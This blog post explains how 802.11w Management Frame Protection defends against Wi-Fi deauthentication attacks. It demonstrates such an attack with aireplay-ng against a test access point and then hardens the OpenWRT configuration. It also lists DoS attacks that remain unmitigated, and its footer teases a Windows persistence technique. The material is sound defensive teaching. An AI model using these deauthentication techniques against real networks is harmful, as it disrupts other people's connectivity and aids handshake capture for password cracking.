Management Frame Protection and its limitations

-
In this article we talk about management frames, their exposure to Denial of Service (DoS) via de-authentication attack, how Management Frames Protection can prevent this and its limitations against other DoS attacks discovered during the years by security researchers.

A brief overview of Management Frames


Management frames are at the centre of the WLAN operability and also have an important role in the negotiation activity between an access point and its stations.

Code Field (Wireshark filter)
Subtype
0x00
Association Request
0x01
Association Response
0x02
Re-Association Request
0x03
Re-Association Response
0x04
Probe Request
0x05
Probe Response
0x06
Reserved
0x07
Reserved
0x08
Beacon
0x09
ATIM
0x0a
Disassociation
0x0b
Authentication
0x0c
Deauthentication
0x0d
Action
0x0e
Reserved
0x0f
Reserved
Management frames subtypes

A station that wants to connect to the network must successfully complete probe, authentication and association phases.
In WPA2, after the association step, the client and the AP will perform the 4-way handshake to generate the Pairwise Transient Key (PTK) that will be used for encrypting the communications during the session.

From an offensive point of view, controlling the management frames ensures the capability of eavesdropping and forging these packets with the aim to disrupt APs and wireless stations operability.

Management Frame Protection


Management Frame Protection (MFP) is a security feature designed with the aim to protect some types of management frames exchanged between the client stations (STA) and the Access Point (AP).

802.11w amendment introduced Management Frames Protection to prevent eavesdropping and forgery of spoofable packets by malicious AP or stations.
However, the 802.11w protocol has been designed to protects only disassociation, de-authentication, and robust action frames. This restriction is due to the infeasibility of encrypting management frames that are exchanged before the 4-way handshake.

Therefore, the main purpose of MFP is to mitigate Denial of Service attacks against already connected stations.

Protected Management Frames VS De-authentication attacks


Protected Management Frames (when supported by both AP and its clients) are a convenient way to prevent De-authentication attack, which is the most common MAC layer attack.

De-authenticating a client is of interest for collecting all the packets exchanged during the 4-way handshake. The 4-way handshake of WPA2, in fact, contains the encrypted Pairwise Master Key (PMK). Once this encrypted PMK is retrieved, an attacker can recover the plaintext passphrase with an offline cracking effort.

Demo


It is time for a test.
In this demo we consider an AP with SSID GL-AR750-444 to which two stations (a windows 10 laptop and an android 8.0 phone) are connected.
After setting the TL-WN722M on monitor mode, we can fire airodump-ng to see what kind of traffic is nearby.


With airodump we identify the target of the test

Now we try to de-authenticate the windows laptop with aireplay-ng tool.

With wireshark we see that the station is being deauthenticated repeteadly by the attacker

As we see, the deauth attack is successful since the windows client tries to reconnect to the AP.

Now we want to ensure that Management Frames Protection (MFP) prevents this Denial of Service. For such purpose we configure the /etc/config/wireless file appending “option ieee80211w’ with value 2, which means that MFP is required.

Option 2 of 'ieee80211w' in the /etc/config/wireless file enforces the FMP capability

To test this mitigation, we try to de-authenticate again the windows client, without success.

Now the station is not disconnected by aireplay packets anymore

However, ‘required’ value is compatible only with stations that support management frame protection. The Android 8.0 phone used during this test is not capable and it failed to connect to the AP.

Therefore, for compatibility mode, setting ‘optional’ (value ‘1’) is recommended.
Let's use this option in /etc/config/wireless file of the OpenWRT router.

Below, we see from packet captured with  Wireshark that both Windows client (intel wifi integrated antenna) and the AP support ‘optional’ value of Management Frame Protection.

Wireless packet showing the flag MFP for the windows client

Wireless packet showing the flag MFP for the Access Point

Now with ‘optional’ value set for the AP, we try to de-authenticate all the connected stations from it.
What we see is that the windows client is not affected by deauth requests, while the Android phone keeps on disconnecting.

Only the Android phone is deauthenticated because it does not support Management Frame Protection feature


Some words on the limitations of Management Frame Protection

Ok, Protected Management Frames are what we need to deploy in our WPA2-Personal or WPA2-Enterprise infrastructures. 
But there are many other attacks that can achieve the same DoS effect and some of them are way more powerful:
  1. ·RF jamming is a technique that does not abuse the 802.11 standards (as the de-auth attack does) but it consists in producing continuously noise on the range on which wireless stations operates. This noise heavily disrupts the operability state of wireless networks.
  2. ·Bugs of Drivers/Firmwares that lead to DoS or possibly to RCE
  3. ·Security researchers have identified many other DoS attacks that are not mitigated by 802.11w amendment. The abstracts are impressive and I really suggest reading these two papers:
§  “Channel Switch and Quiet attack: New DoS attacks exploiting the 802.11 standard” (Bastian Konings, Florian Schaub, Frank Kargl, and Stefan Dietzel) - 2009  
§  “Denial-of-service attacks against the 4-way handshake” (Mathy Vanhoef and Frank Piessens) – 2017 | Note: Mathy Vanhoef is also the author of KRACK :-). 


Conclusion

Management Frame Protection is a feature that should have been deployed since its introduction (2009) but it still missing from recent routers.
However, even with this protection, multiple DoS techniques exist to achieve the same goal of the most common de-authentication attack.

Comments

Post a Comment

Popular posts from this blog

Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence

-
Image
Novel Accessibility Feature Abuse technique While investigating Ease of Access options in Windows 10 for new persistence techniques, I have actually found an undocumented one via 'Provide Narrator feedback' functionality. Behind the scenes the Narrator feedback consists in launching the custom handler via URI scheme ‘feedback-hub’. However, in a post exploitation scenario is possible to trivially backdoor this component with fileless payloads hosted in the registry. Even if there is no security boundary between windows logon screen and the default user desktop (indeed both part of the same window station WinSta0) the possibility of the interaction between the Narrator instance running in the environment of the locked out users and the Windows logon screen opens the chance to trigger the malicious command defined in the registry as soon as the 'Provide Narrator feedback' combination keys are pressed in the latter context. The novel technique presented in this arti
Read more

WPA2-PSK vs WPA2-Enterprise: hacking and hardening

-
Image
This post has the aim to summarise the security aspects of WPA2, with a focus on WPA2-Enterprise hacking. At the end, EAP-TLS is presented as a pretty secure implementation. WPA2 in brief The Wi-Fi Protected Access is a wireless technology designed to secure the communiciations between stations and the Access Point from eavesdropping and tampering attacks. It is defined in 802.11i standard and has been adopted in home, small business (WPA2-Personal) and enterprises (WPA2-Enterprise) since 2004.  The WPA2 implementation is based on the 4-way handshake. The PMK (pairwise master key) is the value that both station and AP know and from which the PTK (pairwise transient key) is calculated and valid for the session. The station MAC, the AP MAC and two nonces (A-Nonce, S-Nonce) that are exchanged during the 4-way handshake are also part of the PTK generation process. From an offensive point of view, capturing the messages of the 4-way handshake that are transm
Read more